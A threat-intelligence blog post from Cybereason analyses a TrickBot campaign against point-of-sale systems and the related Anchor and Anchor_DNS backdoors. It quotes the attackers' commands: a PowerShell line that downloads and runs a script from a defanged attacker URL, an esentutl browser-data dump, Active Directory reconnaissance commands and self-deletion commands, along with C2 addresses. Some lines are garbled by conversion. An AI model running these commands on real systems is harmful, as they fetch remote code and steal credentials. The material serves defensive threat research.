# Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware

**[cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware](https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware)**


-----

Written By
Cybereason Nocturnus

December 11, 2019 | 15 minute read

## Introduction

**Research By: Assaf Dahan, Lior Rochberger, Eli Salem, Mary Zhao, Niv Yona, Omer Yampel and Matt Hart**

Cybereason Nocturnus is monitoring a new wave of targeted campaigns against financial, manufacturing and retail businesses that began in
early October. Similar to attacks [previously reported by Cybereason, this campaign started with a TrickBot infection and progressed into a](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware)
hacking operation targeting sensitive financial systems.

[However, unlike previous operations that focused on causing a massive ransomware infection (Ryuk and](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware) [LockerGoga) by compromising](https://www.fortinet.com/blog/threat-research/lockergoga-ransomeware-targeting-critical-infrastructure.html)
critical assets like the domain controller, this new operation is focused on targeting point of sale (PoS) systems. The campaign leverages a
newly discovered malware family called Anchor exclusively for high-profile targets.

[Learn more about additional attacks that leverage TrickBot.](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware)

This research focuses on the following aspects of the TrickBot-Anchor attack:

1. Anatomy of the Attack: **A** **step-by-step anatomy of the attacks, including infection vectors and a dissection of the tools and techniques**

used by the attackers.
2. New Malware: **[The discovery of a new malware family called Anchor, which includes the Anchor_DNS and a new, undocumented](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns)**

_Anchor that has been operating since August 2018 (and potentially even earlier). The Anchor malware is a backdoor used very_
selectively on high-profile targets, and appears to be tightly connected to TrickBot, potentially even authored by the same individuals who
created TrickBot.

While this blog does not discuss attribution explicitly, the nature of these attacks, specifically the motivation, some of the tools and techniques
[detailed, have certain resemblance to past attacks that were linked to the financially-motivated FIN6 threat actor, a group that](https://attack.mitre.org/groups/G0037/) is known to
[target POS systems and has been linked to TrickBot infections in the past.](https://www.zdnet.com/article/cybercrime-group-fin6-evolves-from-pos-malware-to-ransomware/)


-----

ast y, ou b og e p as es t e g a ty a d da ge t at es co od ty a a e ect o s, as t ey a e t e pote t a o esca at g to a
hacking operation. This can easily lead to a disastrous outcome, whether it be a ransomware infection or theft of sensitive financial data.

## Key Points

**The TrickBot-Anchor Operation: Cybereason Nocturnus is investigating a series of targeted attacks against financial, manufacturing,**
and retail businesses across the United States and Europe.
**Targets POS Systems: The attacks target POS systems to steal sensitive information by taking over critical assets in the victims’**
network.
**Deploys A Backdoor on High-value Targets: On certain high-profile targets, the attackers selectively use a new variant of the rare**
[Anchor_DNS tool. Anchor_DNS is a backdoor that uses the DNS protocol to stealthily communicate with C2 servers.](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns)
**Uses a New, Undocumented Malware: In addition to the new Anchor_DNS variant, the attackers use a completely new and previously**
undocumented malware dubbed Anchor. _Anchor has been in operation since August 2018 and appears to be tightly related to TrickBot._
**Adds Enhancements to TrickBot: This attack adds a new and enhanced stealing module to TrickBot that focuses on stealing**
[passwords from various products, including the KeePass password manager.](https://keepass.info/)
**Uses Known Tools for Reconnaissance and Lateral Movement: The majority of the initial interactive hacking operation uses the**
[known tools Meterpreter,](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter) [PowerShell Empire, and](https://github.com/EmpireProject/Empire) [Cobalt Strike for reconnaissance and lateral movement.](https://www.cobaltstrike.com/)
**Abuses the Trust of Certificate Authorities: Many of the payloads in the attacks are signed binaries, which demonstrates the ever-**
growing trend of signed threats that abuse the trust of certificate authorities to bypass detection.

## Table of Contents

 Anatomy of the Attack: A Step-by-Step Analysis

_An overview of the attack tree, as seen in the Cybereason Defense Platform._

## Infection Vector

_Downloading and injecting TrickBot._

The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus Report.doc”. When
the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen,
[where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet.](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware)


-----

_Phishing email that tricks the user into downloading TrickBot._

### The TrickBot Downloader

The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user doubleclicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update
Microsoft Word or open the file from another computer.

_TrickBot displays a message box suggests updating Microsoft Word or opening the file on another computer to preview the document._

While at first glance these files can be mistaken for legitimate Microsoft Word files, a closer inspection of the file metadata indicates they are
not associated with Microsoft Word, nor are they Microsoft Word document files.

Most of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the relative trust that is
given to signed binaries to avoid detection.

_File metadata properties for the fake Microsoft Word Document._


-----

_Signed malware is an evasive initial entry point into an organization._

The message box distracts the user as TrickBot’s payload is downloaded, stored in the %TEMP% folder, and executed. A new process injects
the TrickBot payload into a svchost.exe process.

_svchost.exe injected code malicious evidence as seen in the Cybereason Platform._

Domain associated with the TrickBot payload download.

## The TrickBot Payload

Once TrickBot’s main payload is injected into the svchost.exe process, it carries out a series of reconnaissance-related tasks to profile the
infected endpoint and the network. This information is crucial, as it determines the course of the attack.

**Checking Network Connectivity**

TrickBot checks for Internet connectivity by trying to access several designated domains. These domains are preconfigured and belong to
legitimate web services, including: checkip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org, icanhazip.com, myexternalip.com,
wtfismyip.com, ip.anysrc.net.


-----

Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related domains. It collects
and sends information about where the target machine is located to the C2 servers.

**Browser History and Credential Theft**

After TrickBot establishes Internet access and sends information about the location of the target machine, it starts its malicious activity. The
[module core-parser.dll is reflectively loaded into svchost.exe. core-parser.dll parses the TrickBot config files and extracts IP addresses for](https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html)
secondary C2 communication, redirection, and web injection logic.

_core-parser.dll injected into svchost.dll._

TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling
the stolen data.


-----

_A list of C2 servers extracted from TrickBot’s configuration._

[TrickBot also steals data from Internet Explorer by executing the built-in Windows tool ESENTUTL using the living-off-the-land technique](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875546(v%3Dws.11))
(LOLBin).
```
esentutl /p /o C:\Users\[USER]\AppData\Local\Temp\grabber_temp.edb

```
[This command dumps the Extensible Storage Engine (ESE) database format.](https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/)

**Application-specific Credential Theft**

[This variant of TrickBot employs a new, unique ability to steal passwords from KeePass, a free, open- source password manager. TrickBot's](https://keepass.info/)
[KeePass stealing capabilities seem to be inspired (or even partially copy-pasted) from a publicly available tool dubbed PoshKPBrute, a script](https://github.com/wevans311082/PoshKPBrute)
that performs a dictionary attack against KeePass .kdbx files. Once it finds the dictionary key, it dumps all passwords as an output and sends
the attackers the master password.


-----

_KeePass stealing brute force tool._

[TrickBot’s stealer module also tries to extract keys from Filezilla,](https://filezilla-project.org/) [OpenSSH and](https://www.openssh.com/) [OpenVPN.](https://openvpn.net/)

_TrickBot attempting to steal keys from Filezilla, OpenSSH, and OpenVPN._

**Reconnaissance Commands**

In addition to several crafted PowerShell commands, the attackers use several legitimate Windows processes to gather information, including
**nltest.exe, net.exe, ipconfig.exe, whoami.exe, and nslookup.exe. They gather information on:**

All trusted domains, domains, and domain controllers
A list of computers and network devices on the network
The infected machine user and groups the user belongs to
The infected machine, including machine name, operating system, workstation domain, and more information
Network adapters that have connected to the machine and DNS servers


-----

_The net.exe process tree._
```
Nltest / domain_trusts /all_trusts
Net view /all
Nltest /domain_trusts
Net view /all /domain
Ipconfig /all
Net config workstation
Nslookup “-q=srv_kerberos._tcp”
/c “start microsoft-edge:http://127.0.0.1:52715/11984”

```
_Reconnaissance commands launched by TrickBot._

The attacker also uses PowerShell to test DNS entry settings. They use the command -q=srv_kerberos_tcp on the process nslookup.exe to
open an interactive shell. They use the shell to expand their search to other machines on the network by searching for things like a list of the
domain controllers.

_TrickBot testing DNS settings._

With this in mind, we gather that the attackers goal is to spread within organizations to multiple machines, not just to the target machine.

## From TrickBot Infection to Interactive Hacking

The threat actor evaluates information sent back to the C2 server and identifies if they have successfully infected a high-value target. If so,
they escalate their efforts by switching to interactive hacking: reconnaissance, credential dumping, lateral movement, and in some cases the
mass deployment of ransomware across endpoints connected to the domain controller.

### PowerShell Payloads

The threat actor leverages PowerShell to send additional payloads to the target machine. They issue commands to fetch a payload from a
secondary server and, once it’s downloaded, immediately execute it on the target machine through PowerShell.


-----

_po e s e e e_ _op_ _do Sty e_ _dde_ _e ecut o po cy bypass c_ _(( e_ _object_
_net.webclient).downloadstring('hxxps://northracing[.]net/?a=irs&x=[base64]'))"_

The northracing[.]net URL contains a PowerShell script in the contents of the webpage. Though we were unable to fetch the script used in this
specific incident, we were able to pivot off the query parameters used in the above PowerShell script (?a=irs&x=) to find a sandbox report for
[similar](https://any.run/report/daf223b923f335c3de66cae8a091063361262669c8f9acaf59a352b1e0e07b8c/b92f9889-00f9-429d-97e4-fb149cfe66db) [activity. The PowerShell payload runs two stages: the first stage sends basic information to the C2 domain and waits for a response to](https://app.any.run/tasks/b92f9889-00f9-429d-97e4-fb149cfe66db/)
see if it should continue its operation. If the threat actor does not send a stop flag, the PowerShell script runs in a constant loop and
continuously POSTs data to the same domain the payload was fetched from. Each POST request is sent along with a UUID generated from
the user’s hostname and the current process ID.

_Information sent along each POST request in the payload._

A POST request containing basic information about the machine is sent, which includes the current user and their domain, the root of the file
system, and information about the operating system.


-----

_The PowerShell payloads using WMI to probe for system information._

This information is sent to the C2 along with the `i` parameter. When a response is received, the payload checks to see if the response
matches the value cex01. If it does, the PowerShell script stops executing and kills the task. If the response is any other value, the script sets a
timeout variable based on the response and continues to the main loop.

This indicates that the attacker is either looking to target specific Windows domains or specific operating system versions.

The main loop sends a POST request to the server with the `t` parameter, which requests the next commands from the server.

_The main loop that sends a POST request to the server._


-----

ac e t e espo se o t e t eat acto co ta s a ase6 e coded co a d, c s decoded a d t e ed ate y e ecuted us g
PowerShell through the Invoke-Expression (IEX) commandlet. The output of the command is sent back to the C2 server using a POST request
with the “a” parameter.

### Meterpreter & Cobalt Strike Implants

_The attack tree demonstrating the beginning of the hacking operation using Meterpreter._

**Meterpreter Implant**

The attackers use a [Meterpreter implant to carry out post-exploitation actions. The Cybereason Platform detects both the shellcode and](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter)
various Meterpreter DLLs reflectively loaded to memory. The detected DLLs include:

**Metsrv.dll: For Meterpreter, where the protocol and extension systems are implemented**
**Ext_server_priv.x86.dll: For privilege escalation**
**Ext_server_stdapi.x86.dll: A metasploit post exploitation module used for reconnaissance**

Cybereason detects the reflectively loaded malicious modules as a Meterpreter agent and shellcode executed by the Meterpreter agent.

_Examining the loaded modules shows which Metasploit modules are loaded._

The Meterpreter agent creates a connection to port 4444 on the external IP address 91.12.89[.]129.

**Cobalt Strike Implant**

Using Meterpreter, the attackers injected [Cobalt Strike and other Metasploit payloads into the rundll32.exe process.](https://www.cobaltstrike.com/)


-----

_Attackers injecting Cobalt Strike and other Metasploit payloads into the rundll32.exe process._

_Detection of Cobalt Strike, Meterpreter, and shellcode execution._

[The attacker uses the following metasploit modules:](https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/)

**ext_server_extapi.x86.dll: Obtains clipboard data and manipulates and decrypts the NTDS file**
**ext_server_priv.x86.dll: Performs privilege escalation**
**Ext_server_stdapi.x86.dll: Performs reconnaissance activity**
**Bypassuac.x64.dll: A post-exploitation module used to bypass User Account Control**

_Post-exploitation modules reflectively loaded to rundll32.exe_


-----

_The connection to the external IP address 199.217.115[.]53 on port 8443._

Both Meterpreter and Cobalt Strike are legitimate penetration testing tools that have been repeatedly used by various threat actors, including
[the FIN6 threat actor.](https://attack.mitre.org/groups/G0037/)

**Active Directory Discovery using Cobalt Strike**

The threat actor uses known Cobalt Strike modules to enumerate Active Directory information:

[https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Invoke-DACheck.ps1](https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Invoke-DACheck.ps1)
[https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Initial-LAdminCheck.cna](https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Initial-LAdminCheck.cna)

The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine’s user is in the admin or
domain admin group.

After verifying the user is an admin, the threat actor gathers information about the domain controllers and their IP addresses using an
additional Base64-encoded and compressed PowerShell command.

_The obfuscated and compressed PowerShell command._

The decoded PowerShell command that attempts to gather domain controller information.

**Active Directory Discovery using ADfind**

[The attackers deploys a batch script that executes the ADfind.exe tool to enumerate users, groups, and computers of the Windows domain.](http://www.joeware.net/freetools/tools/adfind/)
```
adfind.exe -f "(objectcategory=organizationalUnit)"
adfind.exe -gcb -sc trustdmp
adfind.exe -f "objectcategory=computer"
adfind.exe -sc trustdmp
adfind.exe -f "(objectcategory=person)"
adfind.exe -subnets -f (objectCategory=subnet)
adfind.exe -f "(objectcategory=group)"

```
[The ADfind tool has reportedly been used previously in attacks related to FIN6.](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)

## New Anchor_DNS Variant Discovered

One of the most interesting payloads in these attacks is the Anchor_DNS malware, which was originally discovered in October 2019 by NTT
Security. It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS tunneling to stealthily communicate with C2
servers. Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019.\


-----

_Oldest Anchor_DNS sample observed, SHA-1: b388243bf5899c99091ac2df13339f141659bbd4_

This new variant acts as a sophisticated, stealthy backdoor that selectively chooses high-profile targets. Anchor_DNS is still undergoing rapid
development cycles with code changes and new feature updates every few weeks.

This is a new variant of Anchor_DNS that appeared as early as November 2019 and exhibits the following changes in code and behavior:

No self-deletion mechanism shown in previous samples
No internet connectivity checks using legitimate online web services
A built-in capability to check for C2 availability using ICMP (ping)
Additional partial string encryption and code obfuscation

### Static Analysis Observations

**File name** **SHA-1**

anchorDNS_x64.exe 5f1ad1787106de9725005d8da33d815d0994ee83

anchorDNS_x64.exe contains a PDB path with the name of the malware, Anchor_DNS. This file is the 64-bit version of Anchor_DNS, however,
there were earlier instances of the 32-bit version as well. The project name shows that this is the fifth version of Anchor_DNS.

_`PDB PATH: C:\simsim\anchorDNS.v5\Bin\x64\Release\anchorDNS_x64.pdb_

Many strings in the code have typos and grammatical mistakes, further affirming our suspicion that the authors of Anchor_DNS are not native
english speakers.

_Multiple typos and grammatical mistakes in the Anchor_DNS code._

The threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by
implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of
Anchor_DNS and the new variant.


-----

Anchor_DNS was able to stay under-the-radar by using specific execution flags. If these command-line arguments are not supplied, the
Anchor_DNS terminates.

**-i flag:**

creates a scheduled task with the following naming convention (e.g “Notepad++ autoupdate#94654”): [random folder name in
**%APPDATA%]** **autoupdate#[random_number]**

Writes [NTFS ADS files ($TASK, $GUID, $FILE)](https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/)


**Alternate Data**
**Stream**


**ADS Contents** **Decoded Contents**


edskype.exe:$FILE QzpcVXNlcnNcdXNlclxBcHBEYXRhXFJvYW1pbmdcU2t5cGVcZWRza3lwZS5leGU= C:\Users\user\AppData\Roaming\S


-----

edskype.exe:$TASK
Tm90ZXBhZCsrIGF1dG91cGRhdGUjOTQ2NTQ


Notepad++ autoupdate#94654


edskype.exe:$GUID [BASE64] /anchor_dns/[COMPUTER_NAME]

[clientID]/

**-u flag:**

**New Variant: executes the malware’s main communication module with the C2**
**Old Variant:**

Drops a copy in %TEMP%
Creates ADS files ($GUID, $FILE)
**-s flag: appears only on older versions of Anchor_DNS and runs the program without creating persistence and self-deletes once done.**
**--log=: expects a file name to write log file in C:\Users\[USER]**

_Contents of the debug file created by Anchor_DNS._

**C2 Communication**

Older and newer versions of Anchor_DNS communicate over DNS. However, the newer version described here does not check Internet
connectivity using legitimate online web services like ipinfo.io, and instead uses a built-in capability to check for the server’s availability using
the ICMP protocol.

_Determining C2 server connectivity._

DNS Tunneling

[Anchor_DNS communicates with the C2 servers over DNS using DNS Tunneling. With this technique, Anchor_DNS can transfer data, receive](https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152)
[commands, and download an additional payload, as detailed in NTT Security’s report on an older Anchor_DNS sample.](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns)

By implementing DNS Tunneling, Anchor_DNS can evade certain security products that might block certain network protocols or overlook DNS
traffic.


-----

_Example of DNS Tunneling traffic generated by Anchor_DNS._

## Discovery of The Anchor Malware and Its Connection to TrickBot

During our investigation, we found several unidentified malware samples related to TrickBot infections. The malware is dubbed Anchor by its
authors and has been active since August 2018. Unlike Anchor_DNS, the Anchor malware does not implement communication over DNS.
However, it does share many behavioral, code, and string similarities with Anchor_DNS and some similarities to TrickBot.

_Earliest Anchor sample observed (SHA-1:3ed09498214d93c9ec14a15286546d242ad58943)_

_PDB path for the earliest Anchor sample found._

Many Anchor samples have a very low or at times zero detection rate by AV vendors, which could explain the limited reports about this
malware.


-----

_List of Anchor payloads found on VirusTotal with 0/0 detection rate._

The malware has both x86 and x64 versions and contains an installer component to install the malware.

**Payload Name** **Hash** **PDB Path**


anchorInstaller_x86 3ed09498214d93c9ec14a15286546d242ad58943

4bba60ff11f8b150b004960c658ad74a707ebcea

anchorInstaller_x64 e75983b073ff0632e35e237f6622466c2699687c

Anchor_x86 Bd26238fb7d7e16ea79073d882bba00d34dd859c

F3683a0c12154e8bf44d9d942db3eac9e930e7a5

9ebb541dcb24d564448a6f5e00c613b73eba7148

Anchor_x64 46c595e580719a4c54f55b4041f81d6e50ab4062

e5dc7c8bfa285b61dda1618f0ade9c256be75d1a


D:\MyProjects\secondWork\Anchor\Win32\Release\anchorInstaller_x86

C:\Users\ProFi\Desktop\data\Win32\anchorInstaller_x86Code\anchorIn

D:\MyProjects\secondWork\Anchor\Win32\Release\Anchor_x86.pdb

C:\Users\ProFi\Desktop\data\Win32\anchorInstaller_x86Code\Anchor_

D:\Anchor\Anchor\Win32\Release\Anchor_x86.pdb

D:\Anchor\x64\Debug\Anchor_x64.pdb

C:\[JOB]\Anchor\x64\Release\Anchor_x64.pdb


The Anchor payload is delivered by AnchorInstaller _AnchorInstaller unpacks the Anchor DLL and drops it in the %SYSTEMROOT% or_
%SYSTEMROOT%\System32 folder. The dropped DLL is loaded by the service netTcpSvc, which is created by the malware.

_Anchor service persistence found in the registry._

### NTFS ADS File - Storing the GUID

Similar to Anchor_DNS, Anchor creates an NTFS ADS file $GUID to store its GUID:


-----

_Anchor GUID stored as an NTFS ADS._

Unlike Anchor_DNS, which stores the information in Base64, Anchor’s GUID is saved in cleartext.

### Self Deletion

_Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the_
dropper is deleted once the malware was successfully deployed:

cmd.exe /c timeout 1 && del C:\Users\[USER]\[SAMPLE_LOCATION]"
cmd.exe /C PowerShell 'Start-Sleep 5; Remove-Item C:\Users\[USER]\[SAMPLE_LOCATION]'

### C2 Communication

Similar to TrickBot, Anchor tries to establish Internet connectivity and the external IP of the target machine prior to communicating with its C2
servers. It uses the following hardcoded web services to test connectivity:

Once it has established connectivity, it communicates with a set of hardcoded C2 servers.

_Communication with a set of hardcoded C2 servers._

[The request and response follow the same C2 communication format as TrickBot.](http://malware-traffic-analysis.net/2019/10/02/index.html)


-----

_e equest a d espo se o_ _at o_ _c o_

### Connecting Anchor / Anchor_DNS to TrickBot

_Anchor and Anchor_DNS are both directly linked to TrickBot infections, as they are downloaded by TrickBot as secondary payloads. There are_
also several other similarities noted below.

**GUID Generation Function**

The GUID generation functions for Anchor_DNS and Anchor seem almost identical to that of the GUID generated by TrickBot. The GUID
follows this pattern:

**[Machine_NAME]_[Windows_Version].[Client_ID]**

**Malware Name** **GUID**

Anchor_DNS /anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/

Anchor /anchor001/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26

Trickbot /mor49/DAVID-PC_W10017134.55C60B5D13499341D72F5A34C632CFD9

**External IP Check Web Services**

Both Anchor and older versions of Anchor_DNS use a list of hardcoded online web services to determine Internet connectivity and check the
external IP of the infected machine. The same list is also used by TrickBot:

checkip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org, icanhazip.com, myexternalip.com, wtfismyip.com, and ip.anysrc.net.

In certain cases, if internet connectivity cannot be reached, Anchor and older versions of Anchor_DNS will delete themselves.

**Shared C2 Infrastructure**

TrickBot, Anchor, and Anchor_DNS typically use a separate C2 infrastructure. However, in some instances of this attack, there was C2 server
overlap between these infrastructures. For example, the IP 23.95.97[.]59, which is hardcoded in an Anchor sample, has also served
_Anchor_DNS and TrickBot:_

_Anchor sample with hardcoded IP (SHA-1: 9ebb541dcb24d564448a6f5e00c613b73eba7148)_

**Connection to TrickBot**

This above IP address was used by TrickBot to download the squlDLL plugin, which includes email harvesting from SQL servers, screenlocker,
and Mimikatz.

**Connection to Anchor_DNS**

[The same IP resolved to a domain previously used by Anchor_DNS, chishir[.]com.](https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns)


-----

_ass e_ _S_ _o_ _at o_ _o_ _3 95 9 [ ]59, ta e_ _o_ [us ota](https://www.virustotal.com/gui/ip-address/23.95.97.59/relations)

### Comparison Between Anchor Malware Family

The following table gives a comparison between different malware in the Anchor malware family.

**Features** **Anchor** **Old Anchor_DNS** **New Anchor_DNS**

Earliest Observed Sample August 2018 May 2019 November 2019

Command-line arguments? - + +

Self-Deletion + + 
Network Connectivity check via ICMP - - +

Network Connectivity check via web services + + 
NTFS ADS files + + +


TrickBot’s GUID Generation pattern +

(Cleartext)


+

(base64)


+

(base64)


Code Obfuscation Very Little Very Little Obfuscated Code

C2 Communication Protocols HTTP(S) DNS ICMP, DNS

## Rise of Signed Malware

Code signing is meant to provide a level of credibility and integrity to a binary from the developer, and to guarantee that the binary has not
been tampered with. In the past, signing malware was a practice mostly seen with nation-state threat actors. However, this is no longer the
case. Nowadays, more and more commodity malware are being signed with valid certificates, effectively bypassing some security solutions
that grant trust to signed binaries.

Malicious files in this attack were signed by:

Biller FIN Oy
NIRMAL 0013 Limited
BRO-BURGER, LLC

TrickBot payloads and Anchor / Anchor_DNS payloads were at times signed by the same signer, which further demonstrate that these
malware are most likely used by the same threat actor.

In searching for additional signed known and unknown files, we were able to identify dozens of malware samples signed by the same
organizations. Some were also signed with the same serial number.

1. Biller FIN Oy Signer:


-----

[A VirusTotal Signer name search shows malware associated with these campaigns:](https://www.virustotal.com/gui/search/signature%253A%2522Biller%2520FIN%2520Oy%2522/files)

[A VirusTotal Serial Number search shows malware associated with the campaigns:](https://www.virustotal.com/gui/search/signature%253A%252206%252027%2520E6%25203C%2520FA%252011%252017%252045%252084%252028%2520D3%252092%2520DF%2520AA%25208D%2520AE%2522/files)


-----

## Conclusion

This research gives a detailed step-by-step analysis of recent attacks targeting the financial, manufacturing, and retail sectors across the
United States and Europe. These attacks start with a TrickBot infection and, with high-profile targets, can escalate to a hacking operation
leveraging a new malware, Anchor, and a new variant of Anchor_DNS.

[Unlike previously reported TrickBot attacks that resulted in mass ransomware infections, these new attacks focus on stealing sensitive](https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware)
information from POS systems and other sensitive resources in the victims’ network by compromising critical assets.

In addition, Cybereason discovered a previously undocumented malware called Anchor as well as a new variant of the recently discovered
_Anchor_DNS malware. Both Anchor and Anchor_DNS are directly related to TrickBot infections and have code similarities, and sometimes_
also share C2 infrastructure with TrickBot. Anchor_DNS uses various techniques to keep itself under-the-radar, such as communication over
DNS, and the reliance on specific command-line arguments in order to run properly. Through these techniques, it is able to evade many
security products including certain sandboxes and AV vendors.

These attacks stress the danger of commodity malware infections that sometimes may be underestimated due to their frequent use and high
volume. It is important to note that, in this attack, once an endpoint is infected with TrickBot it is up to the attackers to decide their next move. If
they identify a high-value target, they can go beyond the traditional information stealing capabilities of TrickBot and use the target machine as
an entry point to other machines on the network.

This research does not focus on the attribution of these attacks. However, through analysis of the evidence and context presented in our
research, we noticed certain TTP overlaps with earlier attacks that were attributed to the financially-motivated FIN6 threat actor. We leave it to
our readers to draw their own conclusions on the attribution of these attacks.

Lastly, these attacks show how threat actors are shifting toward signed malware more than ever before. As this trend continues to evolve,
security practitioners and security vendors must improve the detection of signed malware and re-think the trust given to signed binaries in
general.

[The best way to defend against an attack like this is to use an iterative security process. Read more in our white paper.](https://www.cybereason.com/unleashing-the-true-potential-mitre-attck?hsCtaTracking=d8b5fccc-df9b-4621-86be-9d72ad635e7f%7C31de2ef9-bf97-4290-a751-4c3ec822e56c)

## Indicators of Compromise

[For a comprehensive list of indicators of compromise, please see the PDF file for this attack here.](https://www.cybereason.com/hubfs/Indicators%20of%20Compromise/Anchor%20IOCs.pdf)

## MITRE ATT&CK Techniques


**Initial Access** **Execution** **Persistence** **Privilege**
**Escalation**


**Defense Evasion** **Credential**
**Access**


**Discovery** **Collection** **Exfiltration** **C&**


-----

Spearphishing
Link

About the Author


[User Execution](https://attack.mitre.org/techniques/T1204) Scheduled
Task


[Modify Registry](https://attack.mitre.org/techniques/T1112) Credentials
[from Web](https://attack.mitre.org/techniques/T1503)
Browsers

[Code Signing](https://attack.mitre.org/techniques/T1116) Brute
Force

[Process Injection](https://attack.mitre.org/techniques/T1055) Private
Keys


Query
Registry

System
[Information](https://attack.mitre.org/techniques/T1082)
Discovery

Permission
[Groups](https://attack.mitre.org/techniques/T1069)
Discovery

Account
Discovery

Domain
[Trust](https://attack.mitre.org/techniques/T1482)
Discovery


Clipboard
Data


Exfiltration
Over
Alternative
Protocol


Da
En

Da
O

St
Ap
La
Pr

Re
Co

U
Us


Scheduled
Task

Execution
through API

Command-Line
Interface


Browser
Extensions

Process
Injection


Scheduled
Task

Bypass User
[Account](https://attack.mitre.org/techniques/T1088)
Control

Access
Token
Manipulation


Deobfuscate/Decode
Files or Information


Credential
Dumping


[PowerShell](https://attack.mitre.org/techniques/T1086) Bypass User
Account Control


[Rundll32](https://attack.mitre.org/techniques/T1085) [Masquerading](https://attack.mitre.org/techniques/T1036) Co
Us

[Scripting](https://attack.mitre.org/techniques/T1064) [NTFS File Attributes](https://attack.mitre.org/techniques/T1096)


Windows
[Management](https://attack.mitre.org/techniques/T1047)
Instrumentation

Execution
[through](https://attack.mitre.org/techniques/T1129)
Module Load


Access Token
Manipulation


**Cybereason Nocturnus**

The Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to
uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and
exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and
Bad Rabbit cyberattacks.

[All Posts by Cybereason Nocturnus](https://www.cybereason.com/blog/authors/cybereason-nocturnus)


-----